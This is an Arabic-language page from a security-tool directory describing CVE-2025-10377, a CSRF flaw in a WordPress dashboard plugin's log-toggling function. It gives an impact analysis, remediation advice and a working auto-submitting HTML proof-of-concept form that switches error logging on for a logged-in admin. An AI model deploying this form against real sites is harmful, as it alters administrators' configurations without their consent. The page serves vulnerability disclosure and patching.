Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
أدوات/GitHubGitHub/nagisayumaa/cve-2025-10377
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2025-10377 تزوير الطلبات عبر المواقع (CSRF) في إضافة System Dashboard (الدالة sd_toggle_logs)

نوع الثغرة: تزوير الطلبات عبر المواقع (CSRF)

الدالة المتأثرة: sd_toggle_logs()

CVSS v3.1: 4.3 (متوسطة)
المتجه: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(ملاحظة: تعكس النتيجة تغيير حالة غير مصرح به يتطلب ضحية بصلاحيات مسؤول وتفاعل المستخدم.)

وصف الثغرة:

تقوم الدالة sd_toggle_logs() بمعالجة عمليات حساسة مثل تمكين/تعطيل سجلات الوصول إلى الصفحات، وسجلات الأخطاء، وسجلات تسليم البريد الإلكتروني. ومع ذلك، فإنها تعتمد فقط على المعامل $_REQUEST['log_type'] والتحقق من الصلاحية (current_user_can( 'manage_options' )) دون تنفيذ حماية CSRF (مثل check_admin_referer() أو nonce).

ونتيجة لذلك، يمكن للمهاجم استدراج مسؤول مسجّل الدخول لزيارة صفحة خبيثة تقدّم طلبًا مصاغًا بصمت، مما يسبّب تغييرات غير مقصودة في تمكين/تعطيل تسجيل الموقع.

التأثير:

  • تغييرات حالة غير مصرح بها لميزات تسجيل الموقع (سجل الوصول إلى الصفحات، سجل الأخطاء، سجل تسليم البريد الإلكتروني).

  • إذا تم تمكين تسجيل الأخطاء، فقد يبدأ الموقع في كتابة أخطاء التطبيق إلى مسار ملف يحدده البرنامج الإضافي (مما يزيد من فرصة كشف المعلومات التشغيلية عبر السجلات)، لكن التأثير المباشر لهذه المشكلة هو تبديل الحالة نفسه.

POC

عندما يزور مستخدم مسجّل الدخول يملك صلاحية manage_options صفحة المهاجم، يتم تبديل ميزة التسجيل المعنية دون موافقة صريحة.

 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

المعالجة

  • استخدام nonces الخاصة بووردبريس (check_admin_referer() أو wp_verify_nonce()) للتحقق من الطلبات.

  • قصر الإجراءات الحساسة على طلبات POST فقط.

  • تجنّب الاعتماد فقط على فحوصات الصلاحيات للحماية من CSRF.

فيديو إثبات المفهوم

إذا لم تتمكن من إعادة إنتاج المشكلة تمامًا كما هو موصوف في التقرير، فيرجى الرجوع إلى العرض التوضيحي بالفيديو التالي (PoC) للحصول على سيناريو إعادة إنتاج واضح:

https://youtu.be/WtWYIfEM4W0

تنزيل الأداة